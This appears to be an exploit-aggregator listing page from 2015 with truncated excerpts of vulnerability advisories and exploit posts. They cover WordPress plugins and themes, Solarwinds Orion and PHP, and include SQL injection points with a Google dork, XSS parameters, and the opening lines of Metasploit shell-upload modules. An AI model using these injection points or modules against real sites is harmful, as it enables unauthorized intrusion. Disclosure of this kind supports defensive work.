WordPress WP All 3.2.3 Shell Upload

5 March 2015 - Source: http://www.mondounix.com
------------------------------------------------------------------------------
WordPress WP All Import Plugin RCE
------------------------------------------------------------------------------
 
[-] Vulnerability Author:
 
James Golovich ( @Pritect )
 
[-] Exploit Author
 
Evex ( @Evex_1337 )
 
[-] Plugin Link:
 
https://wordpress.org/plugins/wp-all-import/
 
[-] Affected Version:
 
Version <= 3.2.3
 
 
[-] Vulnerability Description:
 
 
    Retrieve any file on the system that ends in .txt
    Retrieve any file on the system that ends in .html
    Retrieve any value from the postmeta table
    Upload arbitrary files to system
 
 
Reference:
http://www.pritect.net/blog/wp-all-import-3-2-3-pro-4-0-3-vulnerability-breakdown
 
 
[-]...


WordPress Photocrati Theme 4.x.x SQL Injection

5 March 2015 - Source: http://www.mondounix.com
# Exploit Title: [ wordpress theme photocrati 4.X.X SQL INJECTION ]
# Google Dork: [ Designed by Photocrati ] also [powered by Photocrati]
# Date: [23 / 09 / 2011 ]
# Exploit Author: [ ayastar ]
# Email : dmx-ayastar@hotmail.fr
# Software Link: [ http://www.photocrati.com ]
# Version: [4.X.X]
# Tested on: [ windows 7 ]
 
 
--------
details |
=======================================================
Software : photocrati
version : 4.X.X
Risk : High
remote : yes
 
attacker can do a remote injection in site URL to get some sensitive information .
=======================================================
Exploit code :
http://sitewordpress/wp-content/themes/[photocrati-Path-theme]/ecomm-sizes.php?prod_id=[SQL]
 
greetz...


WordPress Media Cleaner 2.2.6 Cross Site Scripting

5 March 2015 - Source: http://www.mondounix.com
# Exploit Title: Wordpress Media Cleaner - XSS
# Author: İsmail SAYGILI
# Web Site: www.ismailsaygili.com.tr
# E-Mail: iletisim@ismailsaygili.com.tr
# Date: 2015-02-26
# Plugin Download: https://downloads.wordpress.org/plugin/wp-media-cleaner.2.2.6.zip
# Version: 2.2.6
 
 
# Vulnerable File(s):
                [+] wp-media-cleaner.php
 
# Vulnerable Code(s):
        [+] 647. Line
          $view = $_GET['view'] : "issues"; 
        [+] 648. Line  
          $paged = $_GET['paged'] : 1;
        [+] 653. Line
          $s = isset ( $_GET[ 's' ] ) ? $_GET[ 's' ] : null;
 
# Request Method(s):
                [+] GET
 
# Vulnerable Parameter(s):
                [+] view, paged, s
 
 
 
#...


WordPress Holding Pattern Theme Arbitrary File Upload

5 March 2015 - Source: http://www.mondounix.com
##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
require 'socket'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::FileDropper
  include Msf::HTTP::Wordpress
 
  def initialize(info = {})
    super(update_info(
      info,
      'Name'            => 'WordPress Holding Pattern Theme Arbitrary File Upload',
      'Description'     => %q{
          This module exploits a file upload vulnerability in all versions of the
          Holding Pattern theme found in the upload_file.php script which contains
          no session or file validation. It...


WordPress Admin Shell Upload

5 March 2015 - Source: http://www.mondounix.com
##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
require 'rex/zip'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::FileDropper
  include Msf::HTTP::Wordpress
 
  def initialize(info = {})
    super(update_info(
      info,
      'Name'            => 'WordPress Admin Shell Upload',
      'Description'     => %q{
          This module will generate a plugin, pack the payload into it
          and upload it to a server running WordPress providing valid
          admin credentials are used.
        },
      'License'         => MSF_LICENSE,
...


Cross Site Tracer Script

5 March 2015 - Source: http://www.mondounix.com
#!/usr/bin/python
# Cross-Site Tracer by 1N3 v20150224
# https://crowdshield.com
#
# ABOUT: A quick and easy script to check remote web servers for Cross-Site Tracing. For more robust mass scanning, create a list of domains or IP addresses to iterate through by running 'for a in `cat targets.txt`; do ./xsstracer.py $a 80; done;'
#
# USAGE: xsstracer.py <IP/host> <port>
#
 
import socket
import time
import sys, getopt
 
class bcolors:
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'
 
def main(argv):
  argc = len(argv)
 
  if argc <= 2:
    print bcolors.OKBLUE...


Solarwinds Orion Service SQL Injection

4 March 2015 - Source: http://www.mondounix.com
I found a couple SQL injection vulnerabilities in the core Orion service used in most of the Solarwinds products (SAM, IPAM, NPM, NCM, etc…). This service provides a consistent configuration and authentication layer across the products.
 
To be exact, the vulnerable applications and versions are:
 
Network Performance Monitor -- < 11.5
NetFlow Traffic Analyzer -- < 4.1
Network Configuration Manager -- < 7.3.2
IP Address Manager -- < 4.3
User Device Tracker -- < 3.2
VoIP & Network Quality Manager -- < 4.2
Server & Application Monitor -- < 6.2
Web Performance Monitor -- < 2.2
 
At first glance, the injections are only available to admins, as the requests used are on the Manage Accounts...


WordPress ADPlugg 1.1.33 Cross Site Scripting

26 February 2015 - Source: http://www.mondounix.com
=====================================================
Stored XSS Vulnerability in ADPlugg  Wordpress Plugin 
=====================================================
 
.. contents:: Table Of Content
 
Overview
========
 
* Title: Stored XSS Vulnerability in ADPlugg Wordpress Plugin
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://wordpress.org/plugins/adplugg/
* Severity: Medium
* Version Affected: 1.1.33 and mostly prior to it
* Version Tested : 1.1.33
* version patched: 1.1.34
 
Description 
===========
 
Vulnerable Parameter  
--------------------
 
*  Access Code
 
About Vulnerability
-------------------
This plugin is vulnerable to a Stored cross site scripting vulnerability. This...


WordPress WooCommerce 2.2.10 Cross Site Scripting

26 February 2015 - Source: http://www.mondounix.com
====================================================
Product: WooCommerce WordPress plugin
Vendor: WooThemes
Tested Version: 2.2.10
Vulnerability Type: Cross-Site Scripting [CWE-79]
Risk Level: Medium
CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status: Solved in version 2.2.11
Discovered and Provided: Eric Flokstra - ITsec Security Services
====================================================
[-] About the Vendor:
 
WooCommerce is a popular open source WordPress e-commerce plugin with 
around 6.2 million downloads. It is built by WooThemes and designed for 
small to large-sized online merchants.
 
[-] Advisory Details:
 
The WooCommerce plugin gives users the ability to see their stores 
performance...


PHP DateTime Use-After-Free

25 February 2015 - Source: http://www.mondounix.com
#Use After Free Vulnerability in unserialize() with DateTime* [CVE-2015-0273]
 
Taoguang Chen <[@chtg](http://github.com/chtg)> - Write Date:
2015.1.29 - Release Date: 2015.2.20
 
> A use-after-free vulnerability was discovered in unserialize() with DateTime/DateTimeZone/DateInterval/DatePeriod objects' __wakeup() magic method that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely.
 
Affected Versions
------------
Affected is PHP 5.6 < 5.6.6
Affected is PHP 5.5 < 5.5.22
Affected is PHP 5.4 < 5.4.38
 
Credits
------------
This vulnerability was disclosed by Taoguang Chen.
 
Description
------------
 
```
static int php_date_initialize_from_hash(php_date_obj...
```
